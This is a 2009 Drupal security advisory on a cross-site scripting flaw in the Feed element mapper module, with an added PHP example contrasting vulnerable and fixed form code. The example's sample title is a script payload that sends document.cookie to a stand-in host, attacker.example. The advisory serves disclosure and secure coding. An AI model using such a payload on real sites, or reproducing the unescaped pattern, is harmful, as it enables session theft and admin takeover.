[Security-news] SA-CONTRIB-2009-018 - Feed element mapper - Cross site scripting

security-news at drupal.org security-news at drupal.org
Thu Mar 26 18:37:44 UTC 2009


 * Advisory ID: DRUPAL-SA-CONTRIB-2009-018
 * Project: Feed element mapper (third-party module)
 * Version: 5.x
 * Date: 2009-March-26
 * Security risk: Less critical
 * Exploitable from: Remote
 * Vulnerability: Cross-site scripting (XSS)

-------- DESCRIPTION ---------------------------------------------------------

Feed element mapper is an add-on module for FeedAPI that maps elements of a
feed item, such as tags or the author name, to taxonomy or CCK fields. These
mappings are configured by point and click. The module does not correctly
escape content titles before output, enabling malicious users to insert
arbitrary HTML and scripts into certain pages. Such a cross-site scripting [1]
(XSS) attack against sufficiently privileged users may lead to administrator
access to the site.
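
The following is an added illustration of the bug class this advisory
describes (a content title rendered into an administrative page without
escaping) next to the hardened form. It is not the Feed element mapper
module's own code; the function names, the form structure and the sample
node are assumed for illustration only. The two Drupal API calls used,
check_plain() and t() with an @placeholder, exist in Drupal 5 and 6; small
stand-ins are included so the snippet also runs outside Drupal.

```php
<?php
// Stand-ins so the snippet runs from the command line without Drupal.
// Inside Drupal the real check_plain() and t() are used instead.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}
if (!function_exists('t')) {
  function t($string, $args = array()) {
    foreach ($args as $key => $value) {
      // Drupal's t() escapes @placeholders with check_plain() and leaves
      // !placeholders untouched; only the @ form is used below.
      if ($key[0] == '@') {
        $args[$key] = check_plain($value);
      }
    }
    return strtr($string, $args);
  }
}

// Constructed sample input: a node whose title was chosen by an attacker
// (e.g. a user allowed to create content). Not taken from a real site.
$node = new stdClass();
$node->nid = 42;
$node->title = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// VULNERABLE pattern (assumed, not the module's real code): the raw title
// goes into a checkbox #title and a #description. Drupal's form theming
// outputs both strings as-is, so the script runs in the browser of any
// administrator who opens the mapping settings page.
function example_mapper_vulnerable_form($node) {
  $form = array();
  $form['mapping_' . $node->nid] = array(
    '#type' => 'checkbox',
    '#title' => $node->title,                              // not escaped
    '#description' => 'Map elements of ' . $node->title,  // not escaped
  );
  return $form;
}

// HARDENED pattern: every user-controlled string is escaped before it
// reaches HTML output, either explicitly with check_plain() or through a
// t() @placeholder, which escapes for you.
function example_mapper_fixed_form($node) {
  $form = array();
  $form['mapping_' . $node->nid] = array(
    '#type' => 'checkbox',
    '#title' => check_plain($node->title),
    '#description' => t('Map elements of @title', array('@title' => $node->title)),
  );
  return $form;
}

$bad  = example_mapper_vulnerable_form($node);
$good = example_mapper_fixed_form($node);
echo "vulnerable #title: " . $bad['mapping_42']['#title'] . "\n";
echo "fixed #title:      " . $good['mapping_42']['#title'] . "\n";
```

The fixed variant prints the title with `<`, `>` and `"` turned into
entities, so the browser shows the text literally instead of executing it.
When reviewing a module for this class of bug, look for any node title,
username or other stored user input placed into a form element's #title,
#description or #options, or concatenated into returned markup, without
check_plain() or a t() @placeholder in between.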

-------- VERSIONS AFFECTED ---------------------------------------------------

 * Versions of Feed element mapper for Drupal 5.x prior to 5.x-1.1

Drupal core is not affected. If you do not use the contributed Feed element
mapper module, there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:

 * If you use Feed element mapper for Drupal 5.x upgrade to Feed element
   mapper 5.x-1.1 [2]

If you use one of the unsupported Feed element mapper 6.x-1.0 beta versions,
upgrade to Feed element mapper 6.x-1.0-beta5 [3].

See also the Feed element mapper project page [4].

-------- REPORTED BY ---------------------------------------------------------

James Gilliand [5]

-------- FIXED BY ------------------------------------------------------------

Alex Barth [6]

-------- CONTACT -------------------------------------------------------------

The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact [7].


[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/414644
[3] http://drupal.org/node/414640
[4] http://drupal.org/project/feedapi_mapper
[5] http://drupal.org/user/48673
[6] http://drupal.org/user/53995
[7] http://drupal.org/contact

